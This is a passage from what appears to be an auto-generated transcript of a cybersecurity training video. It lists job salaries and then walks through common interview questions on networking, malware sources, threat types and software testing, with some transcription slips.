rupees moving on to the next job role we have senior security consultant a senior security consultant protects their clients Network through regular situational assessments senior Security Consultants are required to carry out an assessment of security networks to spot a system's vulnerabilities strengths and weaknesses following which they guide different it teams in strengthening their security by helping them pick the right Solutions like new techniques or tools they also create preventive measures against future cyber attacks according to indeed the average annual salary of a senior security consultant in the states is around 104 000 and in India it is nearly 12 lakh rupees next we have the role of an application security engineer application security Engineers work with product managers and developers to plan and Implement security releases in order to understand any vulnerabilities Within products they carry a threat modeling tests Dynamic tests and Security reviews following this they optimize a given product's efficacy they ensure that every step of the software development lifecycle follows best security practices they also help in testing the application against security risks before release according to Glassdoor in the US an application security engineer earns around hundred and ten thousand dollars on an annual average basis and in India they make around 9 lakh rupees per annum moving on to our next job role we have security architect a security architect researchers and plans the security elements for their firms they formulate company procedures and user guides the design robust security structures that are capable of preventing malware attacks additionally they also approve the installation of VPN routers and firewalls according to Glassdoor a security architect in the US makes a handsome sum of 150 000 a year on an average and in India they make around 20 lakh rupees per annum and finally at number one on our list we have the role of a chief information security officer ciso ciso is a senior level officers in an organization their duty is to ensure the safety of the information they develop Implement and maintain information security and risk management programs additionally they also interact with stakeholders and regularly brief them with information security concerns according to Glassdoor the average annual salary of a chief information security officer in the states is a whopping 195 000 and in India it is 19 lakh rupees per annum so those were the top 10 highest paying cyber security jobs for 2022. now let's have a look at the company's hiring cyber Security Professionals here we have Deloitte NetApp KPMG Bosch HP Samsung CGI and GE to name a few in this series we are going to discuss about the interview questions that will be asked to candidates uh in the cyber security field we are going to look at multiple options over here and we're going to discuss various fields in which these questions will be asked in this video we are going to look at 10 different questions on networking then we'll have 10 more questions on software and programming another 20 questions on operating systems and applications 10 questions on cyber attacks and then the finally 10 questions on cryptography so we're going to discuss over 50 odd questions each in these different fields which will help you crack your interviews as far as cyber security is concerned let's start off with networking questions let's start off with question one what is the OSI model explain the different layers of the OSI model OSI largely is a theoretical model uh utilized to understand networking and how data packets are created and how they are being processed by a computer this is normally used by the TCP the transmission control protocol over Internet Protocol software suite so OSI is known as the open systems interconnection model it is a reference model that describes how applications are going to interact via the computer network there are seven different layers that we need to understand they are as follows so in this diagram there are these seven different layers we start off from the bottom first is the physical layer the data link layer Network layer transport layer session layer presentation and application then such a question is asked in an interview it is not only that we identify these seven layers explaining what the OSI model is in the first place we then try to identify these seven layers and we give a brief description about each and every layer if there are any additional questions they will come after uh this basic question so let's start off with the physical layer this is the lowest layer of the OSI model now this is where any and every physicality of your computer comes into the picture so it could be an uh network interface card it could be an RJ45 or a CAT5 cable anything that allows data to be transmitted physically from your machine to another machine next comes the data link layer so on the data link layer as far as networking is concerned we just need to understand that data packet is encoded decoded into bits at this layer this is also the layer that deals with Mac addressing so the physical address of every network interface card which is the MAC address which is utilized to Route data package over the network this is where the MAC address resides on the data link layer the next layer is the network layer here datagrams are transferred from one to another the function of this layer routing and logical addressing the moment we talk about routing and logical addressing IP addresses come into the picture IP version 4 IP version 6. so Network layer will deal with IP addressing and the routing of those packets then comes the transport layer this is the layer responsible for end-to-end connections that automatically signifies that this is where TCP and UDP will be working TCP stands for transmission control protocol UDP for user datagram protocol TCP is a connection oriented protocol whereas UDP is a connectionless protocol these two Protocols are utilized to establish connectivity between two machines TCP is a more reliable method of connectivity because there are a lot of packets that are sent across to verify that the data has been sent data has been received and so on so forth whereas UDP is a connection less protocol medata is just dumped without verifying whether the receiver actually receives that data or not so in a nutshell on the transport layer TCP and UDP make their appearance and this is where that functionality lies then comes the section layer this control signals between the computer it established maintains and terminates connections between processes so in the transport layer we talked about TCP and UDP UDP being a connection less protocol where data is just transmitted without verifying whether the receiver received that data or not whereas TCP we studied is more of a reliable protocol thus there are different packets signals that will be sent across to verify that data has been transmitted it has been received properly and then the next uh segment of that data is being sent so those control signals are established using the session layer so the three-way handshake of TCP the acknowledgment packets and those kind of packets will be taken taken care of on the session layer of the OSI model then comes the presentation layer the presentation layer is responsible to translate data into the application layer format so the formatting right mine or encoding that is being utilized the utf-8 character set that we utilize for presentation encryption mechanisms all of these work on the presentation layer and finally comes the application layer where the application itself uses a particular protocol so that the other machine on the receiving end the application on that machine would be able to understand what the communication was about right so in a nutshell if I start from up top the application layer will deal with any of the data that the application is generating so maybe an user input you're logging in you're typing a username password all that data will be constructed let's say to an HTTP or https format that's where your application layer comes into picture then the formatting of which into utf-8 and the encryption of which would be done at the presentation layer then this transport layer and the session layer would kick in to establish a TCP session do the three-way handshake establish that connectivity IP addressing would be done on the network layer Mac addressing would be done on the data link layer and when everything is ready on the physical layer the packet will be sent out at the receiving end the packet will be received on the physical layer and then all these layers will be reversed and finally at the application layer the data would be presented to the application who would then execute it and showcase it on the screen of the recipient so this is the way you want to explain this question you want to be very concise precise about what you're explaining you don't want to go into two hypothetical scenarios you don't want to delete earlier with the layers you just want to give the basic functionality you want to demonstrate that you understand what the OSI layer is how the computer functions and you want to move on from there if the interviewer has any further follow-up questions they will ask those specific questions so that's question one moving on to the question two question two is Define unicasting multicasting and broadcasting now this is a question which can be very lengthy but again most of your interview questions are designed that way it's basically to understand how much conceptually you are aware about these Technologies so you have to be very concise don't go uh rattling about technology too much but in a concise manner just try to explain what these things is so when data is being transmitted over a network it can be transmitted either in one of these particular manners it can either be a unicast multicast or a broadcast so what is unicost unicast is when a message is sent from a single user to a single ratio so one to one right so uh one machine talking to another machine and nobody else so also known as point-to-point Communications 1.1 the point if you have to send information to multiple receivers then you will have to send it using multicast right so this is where your multicast networking comes into the picture so in our case let's assume it's a network where there are there's a Class C Network approximately 255 odd machines and Within These there are two machines that want to talk to each other if they want to talk between each other it would be a point-to-point communication where they will utilize unicast where only these two machines will have visibility of that conversation and the other machines will not even realize that this conversation is taking place if one machine wants to talk to multiple machines then the multicast comes into the picture as the name suggests in this mode of communication data is sent from one or more or more sources to multiple destinations multicast uses the internet group management protocol also known as the igmp protocol to identify groups so under this igmp protocol various groups are created where machines are subscribed to those particular groups and whenever a message needs to be sent through those groups it will be identified by the igmp protocol and then that particular message will be sent to those multiple machines that are members of those particular groups and then comes the broadcast the third method is known as the broadcast as it says it is going to broadcast to all so this is one to all that is communication between a single user and it is going to be sent to all the machines in that particular Network right so the three ways unicast is one to one multicast is one to many and broadcast is one to all and then question number three what is DNS DNS stands for domain name system it is like the internet's phone book that is responsible for mapping the domain name into its corresponding IP address and let me give you an example over here wherever we go and open up let's say a browser a Google Chrome browser we type in www.google.com and then we press enter and magically Google comes in front of us the website rather now how does the computer know who Google is because as far as we are concerned humans understand Google and words like that computers don't computers deal with binary zeros and ones right and as far as Internet is concerned they will only deal with IP addresses and Mac addresses so how does a computer know how to find google.com and where is it located so the moment we type in in the browser window in the address bar google.com and press enter a DNS query is generated automatically by the browser where a packet is sent to our DNS servers asking what the IP address is so in short DNS resolves domain names to their corresponding IP addresses there is a DNS server which will have this index a database of all the domains associated with their IP addresses if one particular DNS server does not have that information that you're looking for it may query another DNS server who may have that particular response so the first thing is when you type in domain name it gets resolved with the DNS it identifies the IP address corresponding to that particular domain name and thus allows the computer to route that packet to the particular server where that domain name resides so in this scenario if you look at the screen on the local PC you have typed in cybersecurity.com there's a DNS resolution that a query that goes to the DNS server what is the IP of cybersecurity.com the DNS server looks it up in its particular database if it has the corresponding IP address it will then respond back the IP address is 172.17.252.1 after which the packet is sent off to cybersecurity.com moving on to question number four what is a firewall now this is a very good question and normally a very basic answer that I've ever heard is that a firewall is a hardware and a software firewall but that's the functionality of a firewall that is what how you can install a firewall but there are different types of firewalls and there is a specific functionality that the firewall is created for right so firewall is either a hardware or software but its responsibility is for blocking either incoming or outgoing traffic from the internet to your computer they secure a network so essentially the firewall will allow a connection to happen or this allow a connection to happen it won't go beyond that that's the basic functionality of a firewall okay so based on the configurations that you have done based on the rules that you have created on the firewall it will then based on those rules identify whether some traffic is allowed in that Network or some traffic is to be blocked from entering that Network so as the screen shows the firewall rules will analyze whether the traffic is good if yes it will allow if the traffic is bad it will block the traffic and not allow that connection from happening in the first place now there are a few common types of firewalls that also need to be included in the answer to this question and the first one is a packet filtering firewall these are the most common types that you will come across which analyze packets and less than pass through only if they match an established security rule set now here people do get confused when we say that we analyze packets people think that these firewalls will analyze the contents of that packet which is not correct where the definition for a packet filtering firewall says that these firewalls analyze packets it means that they are only analyzing the source and destination IP addresses port numbers and the protocols that are mentioned in those packets these firewalls do not have the capability of the packet inspection or a DPI as it is known if that capability comes into the picture you're basically looking at an intrusion detection system or intrusion prevention system in today's world called as a next-gen firewall okay so a packet filtering firewall essentially will only analyze data package for its source and destination IP addresses port numbers and the protocol that is being utilized it will then map that information to the rules that are there on the firewall and based on those rules it will either allow that collection to happen or disallow that connection from happening the second type of is a proxy firewall these firewalls filter Network traffic at the application Level So when you say application Level they work at the layer 7 of The OSI model package filtering firewalls since we have mentioned that did work on IP addressing and port numbers will work on the network layer of the OSI model also on the transporter because we also look at protocols proxy firewalls will work at layer 7 which is this application layer of the OSI model and we'll deal with application Level protocols such as HTTP https FTP SMTP and so on so forth and the third one is a stateful multi-layer inspection firewall these filter packets are the network transport and application layers so they basically do the job of the first and the second type of firewalls the packets are compared to loan trusted packets but now the first question is if there is a stateful multi-layer inspection firewall why do we have type 1 and type 2 firewalls like packet filtering and proxy firewalls that is because that is how the firewalls have evolved we started off with a packet filtering then we added functionality to it and so on so forth so if a question comes what is a firewall you start off with the option saying it is a hardware or software this is the responsibility the functionality of a firewall is to allow good traffic and disallow bad traffic based on the rules that have been configured on the firewall and then you've got basically three types of firewalls packet filtering proxy and stateful multi layer and just include a brief description of each of these firewalls if getting your learning started is half the battle what if you could do that for free visit scale up by simply learn click on the link in the description to know more then moving on to question number five what is a VPN VPN is also called a virtual private Network it is a connection between a VPN server and a VPN client so it basically creates a encrypted tunnel between the client and the VPN server which is then utilized to secure the connections that you are making with the internet so as you can see in the diagram the user has a VPN client installed on their machine the VPN client then creates an encrypted tunnel to the VPN server and through this tunnel encrypted data is transmitted which can then be processed by the VPN server uh sent to the internet information can receive can be received backed by the VPN server the VPN server will encrypt that data back and send it back to the user so if there's a man in the middle attack that is happening or a hacker trying to eavesdrop on the communication mechanism they will not be able to do so because of the encrypted tunnel it is very difficult to decrypt this or hack through this encrypted tunnel it it is possible but it is very difficult to achieve that moving on to question number six what are the advantages of distributed processing now before we go into advantages of distributed processing we first have to understand what is distributed processing so it is a term which describes various computer systems that use more than one processor to run an application here multiple computers across different locations share the same processor the advantages of Distributing processes are as follows but before we go into the advantages distributed computing is basically where multiple machines will pool their resources together to run a singular application so an application that has multiple resources and can scale up and scale down as and when required the advantages are that it can be very very useful in data recovery for example read where your striping data on various hard disks it is reliable it is cheaper lower cost can be achieved and it is easy to expand because of the scalability factor that we just talked about if there is loss of data in one computer it can then be recovered by another interconnected computer and one of the examples would be blockchain in today's world right what is blockchain that this data is created live and stored on a connection of computer so if one of the computers goes offline the other computers in that network will still have that data and there the blockchain will still function without any issues the second point a glitch in one machine does not affect the processing as there will be multiple other machines like we discussed in the blockchain several cost effective mini computers are used instead of costly or Mainframe machine so instead of having a server bank I can have multiple machines connect interconnected together and they can function in that particular blockchain or for that particular distributed processing mechanic is it depending on the amount of data processing more computers can be attached to the network thus you can increase the number of computers that can be a part of that blockchain or you can reduce them as and when necessary moving on to question number seven what is tcpip TCP or transmission control protocol over Internet Protocol is a set of communication protocols that are used to interconnect networking devices on the internet this protocol defines how data should be transmitted over the Internet by providing end-to-end Communications so essentially if you want networking to be established on your machine you will need tcpid without TCP there will be no work groups there will be no domains basically your interconnectivity will go for a toss tcpip is a software that once installed on your machine will then interact with the hardware which is your network interface cards and then your switches wires cables and all those through protocols that have been already pre-configured in it So within the TCP Suite of softwares you will have all the protocols all the functionality of the OSI layer and each and every protocol that works on each and every layer will be predefined and pre-configured to work in a particular manner the Internet Protocol is all about routing each individual packet to make sure it reaches its destination so with the TCP you are talking about the protocols that will allow you to format the data and generate it so that you can communicate it over the network the IP will then deal with the routing of those packets so that the packet can be routed to the correct computer and be received by the recipient so a TCP model is the compressed version of The OSI the seven layers will get converted into four layers the network access layer internet layer transport layer and application layer going on to question 8 what do you mean by ipconfig and ifconfig both of these are commands the first one on a Windows machine the second one on a Linux machine so ipconfig is known as the Internet Protocol configuration this is a command that is used on the command line interface of Microsoft Windows to view all the adapters and the configuration of each and every adapters for their network interfaces so as you can see on the right hand side in the command prompt screen if once you type in the IP config command on the C prompt and press enter it will give you a list of all the adapters that are there so you can see wireless LAN adapter local area connection the media is disconnected it doesn't exist at the bottom you will see the Wi-Fi connection wireless LAN adapter and can give you the IP version 6 IP address IP version 4 address the subnet mask and the default gateway so this is the configuration that allows the machine to know on what network it is on what is the default gateway for communicating to the internet what is the subnet mask so how many computers may exist in that particular Network and what is the IP address of that specific computer so that it can communicate across the network as well ifconfig is the same thing on a Linux Mac or Unix operating system so the command will also give you the list of interfaces and the configuration of each and every interface it is used to configure control the TCP network interface parameters from the command line interface it allows you to see the IP address of these network interfaces so here you can see uh the wlp19s the IP address being 192 168 43.215 subnet mask being 255.255.255.0 with the broadcast being 192.168 43.255. question 9. what is the difference between a domain and a work group this can be a very interesting question and can be a very lengthy question at the same time a work group is nothing but a decentralized network where you have interconnected multiple machines together and each machine acts in its own individual capacity things of itself as a server right so a decentralized network you every user manages the resources individually on their PC so local users on their own PCS managing the network shares what can be shared from that particular machine what data should be shared should not be shared to whom it can be shared with and so on so forth it is good if you got a small Network a few machines all together uh and you want them to interact with minimal management effort right so each computer each user will decide what they want to allow other users to see on that particular Network and all of them would be connected over a land a local area network either a wireless or a wired one so if you look at your home Wi-Fi right now that is one of the best examples of having a work group the domain on the other hand is a centralized Network model so in a corporate environment whenever you go there and you go to domain-based username and password which when entered onto a particular machine gives you access to the entire network or whatever applications and whatever resources have been allocated to you that is where the domain comes in so it it also uses a single sign on mechanism for all the resources that are that are to be made Available to You whereas in a work group your local user only meant for that particular computer right so coming back to the domain it is an administrator who is going to manage the entire domain and all of the resources connected to the domain the resources could be switches routers servers data stores applications web servers Mail Exchange servers and so on so forth so all of these are administered by an administrator through the domain it is the most reliable and Optimum solution for a large Network where multiple users are going to interconnect and share that data amongst each other right the computer can be connected to any network that means you can be on the internet and through the internet using a VPN you can connect to your corporate Network authenticated and get access to whatever resources you are allowed to access whereas in a work group you have to be a part of that Network to access that particular network if you change your location you go and connect to another Wi-Fi you will lose access to your previous Wi-Fi then the last question for the networking section what is data encapsulation in networking data encapsulation refers to the process of adding headers and trailers to the data the data link layer binds each packet into a frame that contains the hardware address of the source and the destination computer so in this example when you're talking about data encapsulation we have talked about how data that has been created by the application layer we'd have a header and a trailer that will give the various informations of where that data needs to be sent so the hardware address which is the MAC address comes into the picture and gets added to the header and the IP addresses port numbers and all of those things would then be added to this trailers as well so that the data can be then routed to the intended recipient of that particular communication with this we end the first 10 questions in networking and in this video we are going to look at software and programming so we're going to look at the first 10 questions first question being how do you keep a computer secure now this is going to be a very generic question so you want to put your best foot forward and you want to identify the most common methodologies on how you can keep a computer secure so when we talk about computers the first thing that you want to talk about is authentication mechanisms where you want multi-factor authentication or two-way authentication to ensure that your accounts are secured now if you look at using passwords depending on how passwords are being stored by the application password attacks can be possible either a Brute Force attack or a dictionary based attack or even password guessing attacks are possible to mitigate those kind of attacks you we need multi-factor authentication to ensure that accounts are kept secure now even if we are using multi-factor authentication we also want to look at secure passwords which means that the password is complex enough to withstand most of the common attacks and a Brute Force attack or a dictionary attack is just not possible so we want to randomize our passwords we want to create a complexity where a password meets standards such as me has at least one lower case one uppercase character has numerics and special characters and is randomized is not based on a dictionary word doesn't contain usernames email addresses phone numbers or anything that is personal to that particular user third keep regular updates which means that there will be patches that will be released for the application for the software that you are utilizing download the patches install them on a regular basis to ensure that you are secured against the most recent attacks that have been identified install a good antivirus could be your Internet Security Suite which will have an antivirus intuition detection system a firewall and will help you protect yourself against ransomware's malware and any script based attacks also have a specialized firewall on your system could be a host based firewall or a network based firewall to ensure that attacks are kept at a minimum and you have your network definitions in place to allow or disallow connections from happening to your devices have anti-fishing softwares installed as well to ensure that you are not getting any spam mails even if you do you're able to identify that and not fall prey or victim to those spam mails phishing attacks are generic where they are directed towards individuals and they prey on the calibrity of that particular individual so our Nigerian frauds or the lotteries that we win on a regular basis of hundreds of million dollars uh those messages the emails that we receive they are all phishing emails where uh they're basically prone to victimize the user and then drop them off money or install some malware or do some other malicious activity if you want to enhance encryption about data that you have stored on your devices or on your or that is accessed by your software or being transmitted by your software use encryption encrypt your data whether it is at rest whether it is in motion or whether it is at use thus reducing data leakage and data loss possibilities and finally in the foremost secure your DNS DNS is the domain name server which is utilized by computers to resolve domain names to IP addresses if a DNS poisoning attack is possible where your DNS settings have been modified by an attacker and you are redirected to a malicious DNS server that server is going to redirect you to another malicious application which may have a malware or a malicious software as a payload also you don't want people to know your DNS servers and the queries that you're making so you want to use secure DNS or DNS over https to encrypt your DNS queries as well so in a nutshell if you follow these eight steps your devices your computers your applications are going to be as secure as possible the next question is security related aspects between C C plus plus and Java now this is an open-ended question it depends on which level you're giving an interview on but you're looking at it from a fresher's perspective or a less experienced perspective and thus these are some of the aspects that we want to look at and the comparisons between C C plus plus and Java so the five aspects that we are looking at are Pointers core translations storage allocation inheritance and overall security uh based on c c plus percent Java so when we say pointers we are looking at how we are going to uh we are using pointers and uh stacks and heaps 2.2 functions and how we exit those functions and how those functions are then recalled into the next function so C supports pointers it is most secure C plus plus also supports Point pointers but it is a little bit less secure than C Java it is not supported tarot access is given to memory allocation and thus it is the least secure as far as pointers are concerned when we look at code translations see is able to compile but it is not secure same with C C plus plus but in Java it is an interpreted language and it is abstracted and secured in storage allocation in CV use malloc and Kellogg memory allocation uh Which is less secure because it does not have internal checks on verifying what memory is allocated and the user input that is being compiled or that is being input to that memory right thus this can allow buffer overflow errors to creep in because of the non-verification of the input data so it is the least secure in C C plus plus it uses new and delete options and is comparatively secure but Java uses a garbage collector and thus is the most secure as well as storage allocation is concerned when we talk about inheritance the most secure is CC plus plus C has no inheritance so it's not secure in C plus plus it is supported thus it is the most secure whereas in Java there is multineritance that is not supported and does this comparatively secure overall the most secure out of all these based on these five aspects is Java the lease accuracy and the mid level is C plus plus moving on to question 13 what are the different sources of malware now malware stands for malicious software right malware is basically a software that poses as a legitimate software but has a payload of atrogen virus spyware keylogger or some malicious software that is going to have a negative impact on security of your particular device so the question here is what are the different sources of malware we want to identify the most common sources through which malware's in fact end user devices in today's world and you can start with pop-up ads so most of the websites if you're visiting untrusted sites if you're being redirected to sites that you don't know about there will be a lot of pop-ups coming your way where it says you're the one millionth visitor to this site please click here to download your gift or it will say uh congratulations on winning a particular product for visiting this page and so on so forth there are some instances where you can see a banner which is flashing at you on top of the page and says that there are eight uh infections that have been identified on your computer click here to download an anti-virus to clean the infections so all of these pop-ups are there as a social engineering attack as a phishing attack to make gullible people click on those links and download those malwares now the software that is posing as a security software itself can be a malicious software which is going to install a Trojan or a virus or a bot on your machine compromising the security of that machine the second is removable media USBS and humans have a fascination with USB so if you find a USB lying around it's a free USB you get excited about it and you want to take it home you want to plug it into a machine and see what's on the USB worst case scenario you format it and you've got a free USB to utilize higher the capacity the better but that is one of the most easiest way people use malware to uh to be deployed on unsuspecting users if there is a USB lying around why would why would somebody want to forget a USB it's most likely planted over there as a social engineering attack so that a gullible person is going to pick it up plug it into their device if the device is not secured enough it is going to install the malware right then documents and executable files this is where your viruses and all those Creeps in so let's say you're surfing on the internet you're looking for a software uh and you find the software on a particular website you do not verify the trustworthiness of that site and you just download and install that software now that software could be malware as well thus if you're surfing on the internet you're downloading files from different locations you have to research the website you have to research the source to ensure that it is trustworthy and only then are you going to download and execute those files thus internet downloads as well and when we say internet downloads it's not just untrustworthy sites we go to torrents we go to uh the dark web or the Deep Web and we are searching for other softwares especially those who are researching security right we always want if you're always on the lookout of new softwares and you're always on those forums which may not be so much trustworthy and we just download those files and start installing them that is a very bad scenario right so you have to be very careful what you are downloading from the internet your antiviruses your uh anti-fishing mechanisms you have hit intelligence mechanisms uh have those uh mechanisms installed and you want to verify where your downloads are coming from then your network connections if it is a P2P connection it is a local area network connection or a metropolitan area network you have to verify whom which devices are connected to your machines and you have to validate those connections before you want to trust those devices uh and before you connect to them if you're on a public Wi-Fi you probably don't want to connect to a public Wi-Fi in the first place then comes email attachments there are so many attachments that come across in today's world most of them in a zip format or a RAR format uh some of them come as document files where there are macros hidden within them macros are scripts that are recognized by Microsoft Office files right and then finally there are these vanishes advertisements that we find online right uh Let It Be Facebook let it be WhatsApp let it be uh any social media platform that you go or even your search engines their job is to display ads their job is not to verify whether the ad is legit or not it is for us as consumers to be careful and validate that ad and verify whether it is a genuine ad or not so just don't start clicking on any of the ad trusting uh the platform that you're on be be sure that you are investigating that ad so these are the most common sources of malware and the end user will always get infected by one of these mechanisms moving on to question 14 how does email work now this is a very uh can be a complex question but we have to keep it as simple as possible and we have to identify that there are two servers where both of them either using SFTP which is the simple message transfer protocol where in this scenario John wants to send an email thus they've got an email client installed on their machine which is connected to the mail Exchange Server which has a DNS server which Maps the routing and which maps The Exchange Server and inboxes so when John composes that message and clicks on send John should be connected to a Mail Exchange Server where the email is sent through that particular person's inbox so John's inbox will then uh be validated and that email will then be sent through the DNS server uh through the internet and will be received by the recipient mail server so at this point in time John also requires the recipient's email address so in this case this is Jack so Jack at something.com would be the email address so while John is composing the two field will have Jack's email address the from field will have John's email address the subject field will have whatever they want to convey as a message the message body will have the message itself and then when John clicks on send it will go to Direction server the extension server will then validate the Inbox and identify where that inbox is located for Jack and then to the internet it will be sent to the email to the mail server of Jack the mail server will then identify the proper inbox.net that that email is to be sent to and it will store that email in that particular inbox when Jack opens their computer and accesses their inbox this email from John will be already waiting for them and they can respond to it the same way John had sent that email if getting your learning started is half the battle what if you could do that for free visit skill up by simply learn click on the link in the description to know more moving on to question 15 what are the types of threats a company can face right and this is where your threat modeling comes into the picture so you're looking at softwares you're looking at operating systems and the company comes and asks you uh what are the threats that are most likely that a company will face so on a broader scale the threats that a company will always face would be classified as natural threats man-made threats technical threats and a supply system threat so a natural threat would be an act of God which is outside the control of human beings could be storms or any natural occurrences like volcanoes thunderstorms flooding earthquakes fire and so on so forth so anything that is natural so it depends on the geographic location that you're in and what kind of climate that area faces and you need to identify the immediate threats and prepare for them so if it is flooding that you're looking at and you want to look at an office uh and the possibility of the office getting flooded is real you probably want to uh take office at a high of lower so that the threat of flooding is minimized for fire we always have a fire drill where we practice our fire mechanism so that we can evacuate all humans as soon as possible and then worry about the technicalities of it under any circumstances under any threats humans will always have the first priority and then everything else comes in manmade threads are where man themselves are a problem so strikes lockouts hackers theft uh War rioting all of those are man-made threads uh which we ourselves cannot be in control of but we need to plan for them and we need to have a business continuity plan or a disaster if you plan for any of these threats that have been identified then come the technical threats technical could be software bugs operating system bugs application bugs that uh that come with the applications that we have or a hardware failure where a server crashes or hard disk crashes maybe uh the processor stops working the motherboard stops working Ram gets corrupted uh any of the technical aspects are stopping uh stop functioning thus creating a break in the business can come under technical right so uh anything to do with computers let's say a server feeling or a patch that is not installed on a particular software those would come under technical threads and then the supply system the supply system are your environmental threats which depend on your supply chain failures what is the supply chain for office to function there are a lot of dependencies that office goes through right there are a lot of other vendors that suppose that support and provide critical infrastructure non-critical infrastructure for the office to function for first and foremost electricity without electricity nothing is going to be powered on and you're not going to be able to function so if there is a electricity service provider and if there is an electric outage that's that comes under Supply system so that's the supply chain failure where the vendor that provides electricity to you has failed in providing that particular service and now you need a business continuity on a disaster recovery plan so you probably have an inverter or you already have a power generator plant that is going to generate your own power and Supply to your system right there could be short circuits because of fluctuation in the electricity uh maybe the internet service provider fails and your internet caches so you have a backup line for the internet from a different vendor right and so on so forth maybe your Hardware vendors who are supplying you servers desktops laptops and whatnot they fail because they feel they are facing a strike or they go bankrupt and suddenly you can no longer purchase Hardware from your vendor because they no longer are in business so that's a supply chain failure so any of these Systems Failing would also come under threats so under a broad category these are the first four threads that you need to identify and then you can elaborate by providing more scenarios based on the experiences that you have had towards each and every of these threads so natural threat where you may have had experience where there would have been let's say flooding uh or any natural disaster which caused a problem for the continuity of your particular business so identify each and every example for each of these threads and provide that as an example in the interview what is black box and white box testing so when you are testing a software or you're testing your infrastructure there are two different tests that you can conduct the first one is a black box the second one is a white box in a black box test there is no knowledge that is shared with the tester so let's say your ethical hacker and you have been awarded a contract by an organization to test their current application that they have developed now they are not going to give you any information they are not going to tell you what the application is they just probably give you an IP address and a port number where the application is hosted and now you have to file in your own queries and try to figure out what the application is try to gather information see what what information can be gathered in the first place and based on that you're going to figure out your way identify vulnerabilities and see if any of those vulnerabilities can lead to a security incident so without any knowledge zero knowledge of the ID infrastructure or the source code that's a black box attack or a black box test a white box test on the other hand is where full knowledge of the IIT infrastructure or the source code is shared so the ethical hacker has complete knowledge and based on the knowledge they are then going to test out the system to see if there are any flaws that they can identify right so why would these two audits be important because the first one a black box audit emulates the attack of a Outsider a external hacker sitting outside the organization trying to figure their way in whereas a white box attack can emulate the attack of an Insider so a disciplinary employee within that organization misusing their access controls or the access rights to make uh unvalidated profits right so somebody's corrupt who has been bribed who wants to sell out company Secrets based so they're going to try to find out vulnerabilities try to steal data and try to sell it on the uh gray market right so a white box would emulate uh internal attack a black box would emulate an external attack moving on to question 17 what is use case testing now use case testing is a functional test and it is also a black box test right what is a functional test it tests the functionality of a particular software once it has been created why is it a black box test because the user doesn't know what the functionality is they just want to find out each and every scenario and try to see what that scenario generates as a response they are not sure whether that is the appropriate response that should be generated or not they're just trying to find out the response that is going to be generated after they fire off a query so this technique is used by testers to get the test scenarios to exercise the whole system from start to finish so let's say it's a login mechanism for an application right now a user at this point in time the tester since it's a black box testing will know that it is a login mechanism they will not know the details of what logging mechanisms are being utilized so they wouldn't know whether input validation is done they wouldn't know whether output encoding is done they wouldn't know how the CGI calls are being made they would not know how the queries are handled at the server side and how the database is going to treat that particular query so they have no idea whether SQL injection attacks are possible and so on so forth so for them with whatever input they are going to try to insert for that login mechanism that's a functional Black Box test the functionality being whether the login mechanism works and based on the type of inputs that are going to put in whether it creates an unwarranted output whether they can bypass the mechanism or they can hack into the system because of some of the flaws that were left behind right another example here is a software made for users to use for documentation the testers will test all the cases that the user can do so can the user view a document can they add new documents can they edit documents and can they delete documents so this functionality will depend upon the access controls that have been granted to a particular user so for this particular user the tester at this point in time they would not know whether they are an administrative user or they are a regular user they'll just try to do all of these and then write the responses saying I was able to view I was able to add I was able to edit and I was able to delete now the result will be then sent to a manager the manager will look at the results and then based on the actual access controls that were supposed to be there for this particular user then we'll try to identify whether this is an acceptable case or whether there were any flaws within this case moving on to question 18 what is static and dynamic testing now this is again in application testing static testing is done in an early stage of development life cycle now software development life cycles there are multiple of those what are these life cycles there are different stages in which a application is created and provided to the customer so your first stage would be determining the scope of the application determining the hardware requirements for that application then creating a flowchart for that application a functional chart for that application and then maybe start coding then an architect comes in tests the code verifies the code then the testing phase comes in then the security testing phase comes in and then the user acceptance testing comes in but in every stage at the very earliest of our stage a static test will always be started to see whatever code has been developed whatever scope has been developed whether that scope is going to be correct or not this will include walkthroughs and code review what is a walk through a walkthrough is going through documents that have been generated and trying to find faults in the documented Journey that has been that has been created so far so let's say somebody has created a workflow or a flowchart for a program how the functions are going to be called and how they're going to be executed so a walkthrough would be where uh all these responsible people will walk through that particular flowchart and find out any flaws within that and then Rectify them if there is any code that has already been written this code will be reviewed manually and any flaws within that code would then be identified static testing will always be 100 accurate in a very short amount of time because it is immediate you have created it and then the export is going to test it to see whether everything is fine or not right it is all about prevention mechanism so since you are doing it at the Inception itself if you find any flaw it gets immediately repaired so this is about preventing vulnerabilities from keeping into that application at a later point in time whereas Dynamic on the other side is done at the end of the development life cycle so you have generated the application everything is ready now you want to do Dynamic testing includes functional and non-functional testing functional testing is where the application itself is being tested the functions to see that all the parameters that are given to the application are functioning properly non-functional testing would be where security parameters administrative parameters all of them are being verified right this is where your test case scenarios come in and uh you're going to test each and every scenario by generating inputs and analyzing the output that the application is going to give you Dynamic testing is all about cure so here you're going to identify vulnerabilities report them to the management and the management is then going to figure out a way of patching those vulnerabilities so that they can be mitigated moving on to the next question what are the test levels in software testing so as far as software testing is concerned there are four test levels module testing integration testing system testing and the final one is acceptance testing so in the testing phase of your development life cycle the first thing is a module test we are going to check your routines your subroutines your sub programs procedures that have been written in a program so all your functions all your mechanisms for that application are going to be tested when you go into integration testing the software may have been integrated with multiple softwares there may be different API calls coming in maybe a third party software on which you are depending upon to supply for information so all of these integration of various softwares various apis are tested to ensure that they are from functioning properly and there are no flaws errors or mistakes left behind in the integration of all of these softwares then the system testing is where the entire system so including the hardware including the software right it starts from the installation so now the software is complete we know which Hardware we are going to support for it we start by installing the software and see whether the installation is going to be completed properly if there are any errors in the installation process itself then once it is installed the performance of that particular application the write speeds the read speeds on the hard disk the transaction speeds that the application is capable of the network dependencies that the application may have all of those would come under system testing and then the acceptance testing which is basically a quality assurance exercise that the application meets the client's requirements so the client in the first stage would have given the scope of what needs to be achieved in the acceptance testing you're verifying that that scope has been met and the client requirements have been met and you can assure the client about the functionality and the performance of that particular application coming to the last question in this uh software programs what are the valuable steps to resolve issues while testing so in the previous scenarios when we have started testing now if you find out when you execute a particular use case and then you find out of law what would be the steps that you would utilize to address those particular flaws in those case the first step will always be record then you're going to report it and then you're going to introduce a Control process for it so when you say record you're going to create logs and you're going to try to resolve all the problems that have happened now when you say resolve you're not going to record the application but you're going to test the system again and again to ensure that whatever is being recorded is accurate and all the logs all the error mechanisms all the dumps all of those that have been generated due to this particular log of up to this particular error are being captured so that they can be reported to the higher level managers so the next step is once you have eventually have accumulated all these logs and Records you're going to report them to the higher level managers who are then going to investigate it and go back to the developers trying to figure out the best way to mitigate those particular flaws so the report writing needs also also needs to be accurate it needs to be to the point it needs to detail what the problem was it will 